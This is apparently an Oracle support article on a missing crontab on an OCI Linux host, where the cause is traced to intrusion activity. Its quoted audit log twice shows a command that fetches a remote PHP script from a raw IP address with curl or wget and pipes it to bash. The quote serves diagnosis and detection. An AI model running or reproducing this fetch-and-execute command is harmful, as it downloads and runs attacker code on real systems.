You're almost there! Please answer a few more questions for access to the Applications content. Complete registration
Interested in joining? Complete your registration by providing Areas of Interest here. Register

OCI: Manually created crontab missing

edited Jan 23, 2024 4:33AM in Linux

Applies To:

Oracle Cloud Infrastructure - Version N/A and later

Linux x86-64


Symptoms:

While running command “crontab -l” – no output is displayed, even though crontab was created.

$ crontab -l


Cause:

The audit logs have captured a “curl” from an unknown source:
type=PROCTITLE msg=audit(01/01/2024 19:29:16.964:10576723) : proctitle=/bin/sh -c (curl -k -s 
http://164.177.71.215/mobile/oebs.php||wget -qO- http://164.177.71.215/mobile/oebs.php)|bash 
type=PATH msg=audit(01/01/2024 19:29:16.964:10576723) : item=1 name=/lib64/ld-linux-x86-64.so.2 inode=67520595 dev=08:03 mode=file,755 ouid=root ogid=root rdev=00:00 obj=system_u:object_r:ld_so_t:s0 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0 
type=PATH msg=audit(01/01/2024 19:29:16.964:10576723) : item=0 name=/bin/sh inode=1854242 dev=08:03 mode=file,755 ouid=root ogid=root rdev=00:00 obj=system_u:object_r:shell_exec_t:s0 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0 type=CWD msg=audit(01/01/2024 19:29:16.964:10576723) : cwd=/u02/PROD/fs2/FMW_Home/user_projects/domains/EBS_domain 
type=EXECVE msg=audit(01/01/2024 19:29:16.964:10576723) : argc=3 a0=/bin/sh a1=-c a2=(curl -k -s 
http://164.177.71.215/mobile/oebs.php||wget -qO- http://164.177.71.215/mobile/oebs.php)|bash 
type=SYSCALL msg=audit(01/01/2024 19:29:16.964:10576723) : arch=x86_64 syscall=execve success=yes exit=0 
a0=0x7f874d913900 a1=0x7f874da6f010 a2=0x7ffebffe4f38 a3=0x379 items=2 ppid=7592 pid=17427 
auid=unknown(12345) uid=unknown(12345) gid=unknown(12234) euid=unknown(12345) suid=unknown(12345) fsuid=unknown(12345) egid=unknown(12234) sgid=unknown(12234) fsgid=unknown(12234) tty=(none) ses=2365 comm=sh exe=/usr/bin/bash subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key=all_cmds

Howdy, Stranger!

Log In

To view full details, sign in.

Register

Don't have an account? Click here to get started!